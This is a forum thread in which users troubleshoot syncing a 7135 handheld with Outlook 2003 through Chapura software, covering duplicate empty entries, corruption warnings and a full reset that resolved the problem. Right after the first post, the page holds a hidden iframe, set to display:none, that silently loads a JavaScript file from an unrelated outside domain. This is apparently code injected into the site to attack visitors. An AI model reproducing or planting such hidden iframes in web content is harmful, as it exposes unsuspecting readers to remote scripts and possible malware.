Chapura / Outlook 2003 Issues...

Anyone else out there upgrade to Office 2003 yet?

After my upgrade, I performed sync's of my 7135 and wound up getting "additional" contact and calendar items inside the new Outlook folder view. They would always be empty.

My info sync'd properly, but if I deleted these additional contact and calendar entries, they would get re-added at every hot-sync.

I just downloaded the updated Chapura sync software, and am getting the same issues.

Anyone have any ideas?

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I installed 2003 and am having some trouble. It warned me about possible corrupt contact data so I hit the cancel on the error maessage and have not had any corrupt contact data yet. I do notice a lot of new things happening during a sync. It does seem to be transferring data the way it should.

I need to do a full reinstall after the Defender game forced a hard reset on my 7135 while travelling. I will try reinstalling all apps fresh and see if Outlook still gives me trouble.

OK, did the full reset/restore from BackupBuddy (deleted saved and unsaved preferences.prc). I had other problems on my 7135 mounting for awhile that prompted this.

Synced up with Outlook 2003, it took a long time.

Said yes to the warning about possible corruption of data.

Outlook popped up and warned something was trying to access my data. I said let it go for 10 minutes. This is new for Outlook, kind of like a Zone Alarm for your Outlook data.

Checked my data and it all looked to be OK.

Hotsynced a couple of more time with no questions and no boxes to answer while sync was going on.

I have not updated any sync software from the original install 4/03. Outlook seems to update Chapura but I'm not sure.

Back in business. Good luck. Looks like it should be safe to use Outlook 2003.
